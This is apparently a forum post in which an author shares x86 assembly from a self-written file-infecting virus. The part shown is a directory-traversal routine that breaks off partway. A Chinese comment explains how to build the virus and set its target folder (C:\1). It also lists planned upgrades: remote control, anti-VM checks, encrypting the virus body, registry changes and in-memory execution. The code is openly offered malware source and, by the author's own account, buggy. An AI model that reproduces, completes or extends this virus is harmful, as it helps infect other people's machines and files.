mov dword ptr fs:[0],esp
push ecx
sub esp,039Ch                         ; locals
push ebx
push esi
push edi
mov dword ptr ss:[ebp-010h],esp
mov dword ptr ss:[ebp-04],00
X10040106A :mov eax,dword ptr[ebp+08]
push ebx
push eax                              ; /s = path
call strlen
add esp,04
pop ebx
mov dword ptr ss:[ebp-014h],eax       ; len
cmp dword ptr ss:[ebp+08],00          ; NULL check after strlen already ran
je X100401085
cmp dword ptr ss:[ebp-014h],00
jg X10040108A
X100401085:                jmp X10040129D   ; exit label is in the full listing above
X10040108A:  mov ecx,dword ptr ss:[ebp+08]
push ebx
push ecx                              ; /src = path
lea edx,dword ptr ss:[ebp-0118h]      ; |
push edx                              ; |dest = pattern buffer
call strcpy
add esp,8
pop ebx
mov eax,dword ptr ss:[ebp+08]
add eax,dword ptr ss:[ebp-014h]
movsx ecx,byte ptr ds:[eax-01]
cmp ecx,05Ch                          ; trailing '\' ?
je X1004010C0
lea edx,dword ptr[strcat_XieGan+ebx]
push ebx
push edx                       ; /src = "\"
lea edx,dword ptr ss:[ebp-0118h]      ; |
push edx                              ; |dest
call strcat
add esp,08
pop ebx
lea eax,dword ptr[strcat_XinHao+ebx]
X1004010C0: push ebx
push eax                       ; /src = "*"
lea eax,dword ptr ss:[ebp-0118h]      ; |

push eax                              ; |dest -> "path\*"
call strcat
add esp,08
pop ebx
push ebx
lea ecx,dword ptr ss:[ebp-0258h]
push ecx                              ; /pFindFileData
lea edx,dword ptr ss:[ebp-0118h]      ; |
push edx                              ; |FileName
call dword ptr[_FindFirstFileA_Addr+ebx]; \FindFirstFileA
pop ebx
mov dword ptr ss:[ebp-025Ch],eax      ; find handle
cmp dword ptr ss:[ebp-025Ch],-01      ; INVALID_HANDLE_VALUE ?
jnz X100401109
mov eax,dword ptr ss:[ebp-025Ch]
push ebx
push eax                              ; /hSearch
call dword ptr[_FindClose_Addr+ebx]; \FindClose
pop  ebx
jmp X10040129D
X100401109 : mov dword ptr ss:[ebp-0364h],01   ; listing ends here


写得不够完美，有很多 bug，还有堆栈溢出。思路是：首先编译完后把它的代码段属性改为可写；inc 文件里可以修改感染目录：WriteVirPath db "C:\1 "    ; C盘下1文件夹。我传个附件给大家作为宿主程序，拷贝到 C:\1 目录下。
还可以改进的地方,比如说加远控,加对抗虚拟机,2次加密病毒体,优化遍历函数防止堆栈溢出,创建多线程,修改注册表,内存运行代码,创建互斥体,等吧